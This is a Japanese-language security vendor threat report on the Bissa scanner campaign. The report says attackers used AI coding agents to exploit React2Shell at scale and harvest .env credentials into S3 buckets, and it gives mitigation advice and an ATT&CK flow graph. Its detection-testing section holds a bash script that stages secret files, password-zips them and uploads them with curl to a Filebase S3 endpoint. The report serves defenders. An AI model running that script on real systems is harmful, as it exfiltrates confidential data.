SOC Prime Bias: 重大

24 Apr 2026 15:19 UTC
newspaper icon DFIRレポート

Bissaスキャナーの露見:AI支援の大規模なエクスプロイトと資格情報収集

Author Photo
SOC Prime Team linkedin icon フォローする
Bissaスキャナーの露見:AI支援の大規模なエクスプロイトと資格情報収集
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

公開されたサーバーにより、Bissaスキャナプラットフォーム、Claude Code、OpenClawを使用し、React2Shellの脆弱性(CVE‑2025‑55182)を通じてインターネット接続対象を自動的に悪用する大規模な操作が明らかになりました。このキャンペーンは、AI、クラウド、支払い、メッセージングサービスから高価値の資格情報を含む数百万の.envファイルを収集しました。収集されたデータは、さらなる利用のためにFilebaseの公開S3バケットにアップロードされました。この操作は、金融、暗号通貨、小売業界の組織をターゲットにしました。

調査

アナリストは、被害者の環境をスキャンし悪用し、検証し優先順位をつける作業フローを示す13,000を超えるファイルを回収しました。ログには、React2Shellエクスプロイトを使用した900を超える成功した侵害が確認されました。Telegramボットはリアルタイム警告に使用され、各ヒットを被害者の詳細にリンクしました。スキャナにはWordPressのW3 Total Cacheの脆弱性(CVE‑2025‑9501)に対応するモジュールも含まれていましたが、成功した悪用は確認されませんでした。

緩和

特にReact2ShellおよびWordPress W3 Total Cacheコンポーネントを、脆弱なアプリケーションやフレームワークを迅速にパッチしてください。機密情報を.envファイルから専用のシークレットマネージャーに移動し、資格情報を定期的に変更します。クラウドメタデータアクセスを強化し、最小権限RBACを適用します。外部ストレージサービスへの無許可のアップロードを検出するためにアウトバウンドトラフィックを監視します。

対応

CVE‑2025‑55182の悪用や無許可のS3アップロードの検出ルールを実装します。既知の悪意のあるドメインやTelegramボット通信をブロックします。コンプロマイズされたホストのフォレンジック分析を行って残留ペイロードを特定し除去します。被害を受けたユーザーに通知し、漏洩した資格情報を直ちに変更します。

"graph TB %% クラス定義 classDef technique fill:#ffcc99 classDef tool fill:#cccccc classDef action fill:#99ccff classDef operator fill:#ff9900 %% ノード tool_bissa_scanner["<b>ツール</b> – <b>名前</b>: Bissaスキャナ<br/><b>目的</b>: ターゲットフィードを使用して大規模なアクティブスキャンを実行"] class tool_bissa_scanner tool tech_T1595_002["<b>技術</b> – <b>T1595.002 アクティブスキャン: 脆弱性スキャン</b><br/><b>説明</b>: インターネット接続ホストをスキャンして脆弱なサービスを見つける"] class tech_T1595_002 technique tech_T1190["<b>技術</b> – <b>T1190 公開Webアプリケーションのエクスプロイト</b><br/><b>説明</b>: 脆弱なWebアプリケーションを悪用して初期アクセスを取得"] class tech_T1190 technique tool_react2shell["<b>ツール</b> – <b>名前</b>: React2Shell (CVE‑2025‑55182)<br/><b>機能</b>: 特製のReactペイロードによるリモートコード実行を提供"] class tool_react2shell tool tech_T1210["<b>技術</b> – <b>T1210 リモートサービスのエクスプロイト</b><br/><b>説明</b>: リモートサービス上でペイロードを実行してコード実行を獲得"] class tech_T1210 technique tech_T1211["<b>技術</b> – <b>T1211 防御回避のためのエクスプロイト</b><br/><b>説明</b>: 防御を回避して隠れるために脆弱性を利用"] class tech_T1211 technique tech_T1552_001["<b>技術</b> – <b>T1552.001 安全でない資格情報: ファイル内の資格情報</b><br/><b>説明</b>: .envなどの構成ファイルに保存された資格情報を収集"] class tech_T1552_001 technique tech_T1119["<b>技術</b> – <b>T1119 自動化された収集</b><br/><b>説明</b>: エクスフィルトレーションのために収集されたデータの検証、優先順位付け、およびバッチ処理を自動化"] class tech_T1119 technique tech_T1102_002["<b>技術</b> – <b>T1102.002 Webサービス: 双方向通信</b><br/><b>説明</b>: Webサービス(Telegramボット)を使用してコマンドとデータを交換"] class tech_T1102_002 technique tool_telegram_bot["<b>ツール</b> – <b>名前</b>: Telegramボット @bissapwned_bot, @bissa_scan_bot<br/><b>目的</b>: コマンド&コントロールチャネル"] class tool_telegram_bot tool tech_T1567_002["<b>技術</b> – <b>T1567.002 Webサービスを介したエクスフィルトレーション: クラウドストレージへのエクスフィルトレーション</b><br/><b>説明</b>: Webサービスを介して盗まれたアーカイブをクラウドストレージにアップロード"] class tech_T1567_002 technique tool_filebase_bucket["<b>ツール</b> – <b>名前</b>: Filebase S3互換バケット (bissapromax)<br/><b>目的</b>: エクスフィルトされた資格情報アーカイブを保存"] class tool_filebase_bucket tool tech_T1537["<b>技術</b> – <b>T1537 データをクラウドアカウントに移転</b><br/><b>説明</b>: 後の回収のために攻撃者制御のクラウドアカウントにデータを移動"] class tech_T1537 technique tech_T1068["<b>技術</b> – <b>T1068 権限昇格のためのエクスプロイト</b><br/><b>説明</b>: 収集した資格情報を利用して権限を昇格させ横方向移動をする"] class tech_T1068 technique %% 接続 tool_bissa_scanner –>|実行| tech_T1595_002 tech_T1595_002 –>|脆弱なサービスを特定| tech_T1190 tech_T1190 –>|使用| tool_react2shell tool_react2shell –>|ペイロードを提供| tech_T1210 tech_T1210 –>|有効化| tech_T1211 tech_T1211 –>|許可| tech_T1552_001 tech_T1552_001 –>|供給| tech_T1119 tech_T1119 –>|データ送信| tech_T1102_002 tech_T1102_002 –>|実装| tool_telegram_bot tech_T1102_002 –>|エクスフィルトレーション| tech_T1567_002 tech_T1567_002 –>|保存| tool_filebase_bucket tool_filebase_bucket –>|有効化| tech_T1537 tech_T1537 –>|サポート| tech_T1068 "

攻撃フロー

シミュレーション実行

前提条件: テレメトリ & 問題点事前チェックが完了している必要があります。

  • 攻撃の全容 & コマンド:
    攻撃者は機密文書のセットを収集しました /var/secret/。検出を避けるために、データをまずパスワードで保護されたZIPファイルにアーカイブし、その後 curl を使用して、企業のフォワードプロキシを通じてアーカイブをFilebaseのS3エンドポイントに直接アップロードします。プロキシは、検出ルールと一致する完全なリクエストURLをログに記録します。

  • リグレッションテストスクリプト:

    #!/usr/bin/env bash
set -euo pipefail

# 1⃣ データのステージング (T1074)
STAGE_DIR="/tmp/staged_data"
mkdir -p "$STAGE_DIR"
cp -r /var/secret/* "$STAGE_DIR/"

# 2⃣ データのアーカイブ (T1560.001) – パスワードで保護されたZIP
ARCHIVE="/tmp/exfil_archive.zip"
ZIP_PASSWORD="P@ssw0rd!"
zip -r -P "$ZIP_PASSWORD" "$ARCHIVE" "$STAGE_DIR" > /dev/null

# 3⃣ Filebase S3エンドポイント経由でのエクスフィルトレーション (T1020)
# プロキシは http://proxy.company.local:3128 で到達可能です
FILEBASE_URL="https://s3.filebase.com/mybucket/exfil_archive.zip"
curl -x http://proxy.company.local:3128 
     -T "$ARCHIVE" 
     -H "Host: s3.filebase.com" 
     -H "User-Agent: Mozilla/5.0" 
     "$FILEBASE_URL" 
     --silent --output /dev/null

echo "エクスフィルトレーション試行完了。"

  • クリーンアップコマンド:

    # ステージングファイルとアーカイブを削除
rm -rf /tmp/staged_data /tmp/exfil_archive.zip

# (オプション)必要に応じてプロキシ接続をフラッシュ
# Squidの場合: squid -k rotate
echo "クリーンアップ完了。"

SOC PrimeのDetection as Codeプラットフォームに参加し ビジネスに最も関連性のある脅威に対する可視性を向上させましょう。開始して即座に価値をもたらすためには、今すぐSOC Primeの専門家とのミーティングを予約してください。

無料で参加